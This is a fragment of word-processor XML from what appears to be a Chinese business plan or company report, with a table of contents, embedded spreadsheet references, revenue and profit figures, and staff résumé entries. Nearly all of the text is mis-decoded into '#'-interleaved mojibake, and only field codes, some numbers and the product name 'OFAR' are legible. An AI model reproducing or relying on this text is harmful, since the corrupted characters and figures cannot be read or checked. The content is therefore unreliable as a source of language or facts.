        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#,{]N?#R # #??D??#f</w:t>
        <w:tab/>
        <w:t>### #P#A#G#E#R#E#F# #_#T#o#c#4#6#4#9#0#1#0#4#3# #\#h# #####2#2###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#,{AS?#R # #"??R??#R</w:t>
        <w:tab/>
        <w:t>### #P#A#G#E#R#E#F# #_#T#o#c#4#6#4#9#0#1#0#4#4# #\#h# #####2#5###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#,{AS#N?#R # #Θi??c6R</w:t>
        <w:tab/>
        <w:t>### #P#A#G#E#R#E#F# #_#T#o#c#4#6#4#9#0#1#0#4#5# #\#h# #####2#6###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#,{AS?N?#R # #y??v?[?e??^</w:t>
        <w:tab/>
        <w:t>### #P#A#G#E#R#E#F# #_#T#o#c#4#6#4#9#0#1#0#4#6# #\#h# #####2#7###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#,{AS</w:t>
        <w:tab/>
        <w:t>N?#R # #vQ?[</w:t>
        <w:tab/>
        <w:t>### #P#A#G#E#R#E#F# #_#T#o#c#4#6#4#9#0#1#0#4#7# #\#h# #####2#7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,{#N?#R # #lQ?S?W,g?`?Q</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#lQ?S</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>T?y_#_#_#?m3W?:N5uP[</w:t>
        <w:tab/>
        <w:t>gP?lQ?S_# # # # # ##b?z?e?_#_#2#0#0#1#t^1##g2#6#?e # # # # # # # #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?l?QD?,g_#_#_#5#0##N_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_# #?[E?0RMOD?,g_#_#5#0#_##N_#_#_#_#_#_#_#_#_#_#_#_#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#vQ-N?sё0RMO_#_#_#_#_#5#0#_##N_#_#_#_#_#_#_#_#_#_# #?eb_D??N`S???N?k?O_#_#_#_#_#0#_#_#_#_#_#_#_#%#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?l?Q0W?p_#_#_#_#_#?m3W#^?[?[:S?w?\?eQWENz??]#N?VA#2##h-#7#|i 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Q?S'`(?:N#?*N?N?rD? #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#lQ?S?li?#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#_#_#_#_#lQ?S?#b?z?Neg#N?v?R?NR??^zf???N?T#x?S#u?N#?.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0#2#t^#_?Y;NSbR??^#\??aS?#??v#x?S#u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</w:t>
        <w:tab/>
        <w:t>gG#O#F#A#R#?TLrR??^R??^#_sQ#0O#N#W#E#L#L#R??^zf??#?#0O#C#K#R??^zf??#?I{</w:t>
        <w:tab/>
        <w:t>N*N?TLr#03u???V?Q#N)R1#5#y?#0lQ?S??^?z?Neg?l</w:t>
        <w:tab/>
        <w:t>gvQ?[?v;N%?#N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/fZPR??^#?#0?l</w:t>
        <w:tab/>
        <w:t>gvQ?[?lD??eQ#0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?vMRlQ?S;N????#N?`?Q#?#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>### #E#M#B#E#D# #E#x#c#e#l#.#S#h#e#e#t#.#8# # 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vMRlQ?S?Q??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>蕾</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?n?`?Q#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?V1##??~?~?g?g?V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Q?S?f?~?~%?ǐ?v#N?R</w:t>
        <w:tab/>
        <w:t>g_#_#_#R??^#\??aS?#?_#_##0_#_#_#_#R??^v#o#d#?|?~ ##0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#lQ?S?vMR?~%??v#N?R:N # #_#_#R??^#\??aS?#?#0 #?e?~e??c#_sQ_#_#_#_#_##0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#;N%?#N?R:N_#_#_#_#_#R??^#\??aS?#?#0?e?~#_sQ_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Q?S?vMRL??]?`?Q#??Y#??b</w:t>
        <w:tab/>
        <w:t>gXT?]_#_#8#6#_#_#_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'Y#N?N</w:t>
        <w:br/>
        <w:t>N?e#S#z?^?v</w:t>
        <w:tab/>
        <w:t>g_#2#7#_#_#_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SXT?];`pe_#_#_#3#1#_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Yf[,g?y?N</w:t>
        <w:br/>
        <w:t>N?v</w:t>
        <w:tab/>
        <w:t>g_#_#1#1#_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SXT?];`pe_#1#2#_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x?Xf[MO#?+T-N?~L??y</w:t>
        <w:tab/>
        <w:t>??N</w:t>
        <w:br/>
        <w:t>N?v</w:t>
        <w:tab/>
        <w:t>g_#_#3#_#?N_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SXT?];`pe_#_#3#_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}Y#Rh?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#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>### #E#M#B#E#D# #E#x#c#e#l#.#S#h#e#e#t#.#8# # #######</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#lQ?S?~%?"??R?S?S#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?USMO#?#NCQ</w:t>
        <w:tab/>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#y? # # # #?v##,gt^?^##MR1#t^##MR2#t^#######?.U6eeQ##1#8#,#1#5#8#,#1#1#2#.#8#0# #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###1#4#,#4#2#8#,#6#5#8#.#6#2# #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###1#2#,#4#7#0#,#1#3#9#.#4#5#######?k #)R #?m##7#,#2#2#7#,#0#8#7#.#0#4# #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###5#,#1#1#0#,#3#4#2#.#5#9# #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###4#,#4#1#4#,#7#5#2#.#4#######?~ #)R #?m##2#4#7#3#,#6#4#2#.#4#0# #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###1#,#5#8#0#,#5#1#4#.#2#7# #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###1#,#6#6#9#,#6#6#9#.#0#0#######;` #D? #?N##5#,#3#6#2#,#4#0#5#.#1#5# #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###5#,#0#1#0#,#0#9#0#.#4#5# #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###4#,#3#8#1#,#0#8#2#.#9#4#######;` ##? #:P##1#,#8#7#9#,#9#5#8#.#2#9# #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###1#,#6#4#4#,#0#0#1#.#0#1# #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###1#,#0#1#7#,#8#2#1#.#6#4#######?Q #D? #?N##5#,#3#6#2#,#4#0#5#.#1#5# #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###5#,#0#1#0#,#0#9#0#.#4#5# #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###4#,#0#6#5#,#1#4#8#.#4#9# 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lQ?Sя#g?S*geg3# #~# #5#t^???[?s?v?v#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_#_#_#_#_#_#_#3#t^?QL?#N?v#hZP0RL?#N,{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#t^?Q???vhQ?V8#%#?vR??^#^:W#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#_#_#_##?.U6eeQ#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t># # # # # # # # # # #t^?N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#y??v##,{#Nt^##,{?Nt^##,{</w:t>
        <w:tab/>
        <w:t>Nt^##,{?Vt^##,{?Nt^####6eeQ##3#5#7#0#.#4###1#0#3#8#4###2#6#2#8#0###8#5#1#2#0###1#6#0#2#4#0#####/e?Q##2#6#3#9#.#1###5#3#3#2###1#2#4#0#8###4#0#1#7#0###7#4#5#8#0#####?k)R##2#9#3#0#.#4###8#0#4#4###1#9#8#0#0###5#9#2#0#0###1#1#1#6#4#0#####?Q)R?m##1#4#3#1#.#3###4#8#2#4###1#2#9#1#6#.#5###4#1#2#1#2#.#5###7#8#4#9#5#####?Q)R?s##4#0#.#0#9#%###4#6#.#4#6#%###4#9#.#1#5#%###4#8#.#4#2#%###4#8#.#9#9#%####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</w:t>
        <w:tab/>
        <w:t>Nt^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#O#F#A#R#?TLrR??^zf???N?T#b:N?V?Q,{#N'Y?TLr#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#_#_#_#(W,{?Nt^lQ?S??hy</w:t>
        <w:br/>
        <w:t>N#^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Q?Sя#g?S*geg3# #~# #5#t^?v?SU\?e#T#0?SU\#beu?T???[?s?v?v#h#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#я#g?SU\?e#T#?1#t^?Q#x?S?[?UR??^?[?b</w:t>
        <w:tab/>
        <w:t>gMR?w'`?v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eQlQ?S?of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?_lQ?S?N?T(W5#t^?Q</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N=?#T#03#t^?QZP#bR??^zf??#NHQ#?#05#t^Sb ?#b-N?VR??^zf??5uP[?N?T,{#N?TLr#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#3#-#5#t^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N?bD?#\M?#u?Q2#*N#O#N#0#N*N/f?N#x?S#u?N6R ?:N;N?v?[SO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n</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N?e:NR??^?c?O?e?N?T#0?S#N*NQ?~#O#N/f?S?s?N?T\O:Nnbc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_?v?f'Y?N&lt;P#0?*N#b?f???`:N???bQ#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#3#t^?Q???b</w:t>
        <w:tab/>
        <w:t>g8#0##N??[?b?vD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^#N*N#b?q?v???bQ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NQ?~?N?%??N?TR??^:N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??ZP0R:NR??^?cGSlx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R??^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:NR??^VS?b#0#b?N?k#?.U#N?R??^1\I{?N?[ň?N#N*N???bQ?v?~?z?|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UO?b#`?Oo`zzn?Oo`??#O?[?e O#?0R?S)R(u?v???bQ#0v^#N9e?S#^:W???bQ?v?cOё?v)R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/f(u?N?T?N?S.U#T</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?R?Snbc?b?#b#?R??^?vzzn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g???_3?IQ)R?m#0dk?e???L?,{?N!k??D?#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#5#t^?Q?b</w:t>
        <w:tab/>
        <w:t>g1#5#0##N??[?b?vD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\?e@b</w:t>
        <w:tab/>
        <w:t>g?v???bQ#\?S0R#^:W?y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R?mzz?#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g</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N9e?SFU#N!j#_#\???N#uX[#0#b?N?TR??^?[?b</w:t>
        <w:tab/>
        <w:t>g)Y6q?v?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ND??n?v?m?^)R(u/f?~?|???bQ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>N?S?k?b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??bQ?S9Y?Q?e#b?N?v:g#O1\?f'Y#0?V:N#b?N/fHQ9e??[?b?QVS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#N?S?N?_?s?*N?e#_8l?~?~%?#0#b?N?vnbc?N&lt;P?V6e#T?S?NNOcOVS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#b?N?v?[7b6R ?#N*N?f#R?{?v%?#?s^?S#0,g(?</w:t>
        <w:br/>
        <w:t>N_N/f?[7b?b???Qeg:N?N?N??]?^?v?vs^?S#0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,{?N?#R # #lQ?S?{#tB\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#c??N#O#bXT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>TUS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?^?S##L? # # # #?R##?Y # # # #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>T##?] # #\O # #US # #MO##T??|5u?####1###c? #?N #?##UO?m##?m3W#^?:N5uP[</w:t>
        <w:tab/>
        <w:t>gP?lQ?S##1#3#3#1#2#9#1#3#0#6#6#####2###c? # # # #?N##NgSf?\##?m3W#^?:N5uP[</w:t>
        <w:tab/>
        <w:t>gP?lQ?S##1#3#8#2#3#6#9#5#7#6#6#####3###c? # # # #?N##?^=N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?##?m3W#^?:N5uP[</w:t>
        <w:tab/>
        <w:t>gP?lQ?S##1#3#3#9#2#8#6#1#3#3#2#####</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#c??N?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?Y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>T_#_#_#UO?m_#_#_#_#_#'`+R_#_#_#7u_#_#_#_#_#t^??_#_#_#_#4#1#_#_#_#_#_#M|/?_#_#_#_#_l?_#_#_#_#_#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#f[?S_#_#_#_#_#,g?y_#_#_#_#f[MO_#_#_#_#?ef[_#_#_#_#@bf[#N#N_#_#?ef[_#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?k#Nb?!h_#_#?V?]'Yf[_#_#_#7b?S@b(W0W_#?m3W_#_#_#T??|5u?_#_#1#3#3#1#2#9#1#3#0#6#6#_#_#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#;N???~?S?T#N?~#?UO?m#0lQ?S;`?~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^#N?m3W?N#0?N'YE#M#B#A##01#9#9#5#t^?eQ?m3Wwcz?lQ?S1\?N#N?R?~#t#N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L?#g????[^?]#RlQ?S?S?_#N?~?cL?,{#N#?2#0#0#1#t^#R?R?m3W?:N5uP[</w:t>
        <w:tab/>
        <w:t>gP?lQ?SlQ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\?N;`?~#t#N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%?lQ?SASt^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?:N#\??#??TLr#b:N?V?QW?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>T?TLr#0(WI#T##O#N?v?{#t?T%?#?V{#R?eb?</w:t>
        <w:tab/>
        <w:t>g@w^?8^0N?[?v?~??#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?b/g#_?S#?#??N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?Y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>T_#_#NgSf?\_#_#_#'`+R_#_#7u_#_#_#_#t^??_#_#2#8#_#_#_#_#_#M|/?_#_#Vn#S??[_#_#_#_#_#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#f[?S_#_#_##xvz#u_#_#_#_#f[MO_#_#?]f[Ux?X_#_#_#@bf[#N#N_#_#???{:g_#_#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?k#Nb?!h_#_#_#?_l'Yf[_#_#_#_#7b?S@b(W0W_#_#_#?m3W_#_#T??|5u?_#_#1#3#8#2#3#6#9#5#7#6#6#_#_#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#;N???~?S?T#N?~#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#_#_#_#_#_#_#_#_#2#0#0#7#t^???_</w:t>
        <w:tab/>
        <w:t>N?\'Yf[???{:g#N#NUx?Xf[MO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t^?eQ?m3W?x?llQ?S1\?N?b/g??~#t#N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L?#g?#_?S?Q?T??P[lQ?SM?WY?v2#.#4#G#</w:t>
        <w:tab/>
        <w:t>g?nR#F#I#D#?|?~#?2#0#0#9#t^?ReQ?m3W?:NlQ?S1\?N?b/g;`?v#N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,gy??v?v;N???b/g#x?S?N#0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##^:W%?#?#?#??N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?Y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>T_#_#u??h_#_#_#'`+R_#_#_#_#sY_#_#_#t^??_#_#_#_#3#3#_#_#_#_#_#M|/?_#_#_#_#?V?]?l?]_#_#_#_#_#_#_#_#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#f[?S_#_#_#'Y#N_#_#_#_#_#f[MO_#_#_#_#_#_#_#_#_#_#_#_#@bf[#N#N_#_#_#_#_#?~Nm_#_#_#_#_#_#_#_#_#_#_#_#_#_#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?k#Nb?!h_#_#_#_#?l?]f[b?_#_#_#_#7b?S@b(W0W_#_#_#?V?]_#_#_#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#;N???~?S?T#N?~#?</w:t>
      </w:r>
    </w:p>
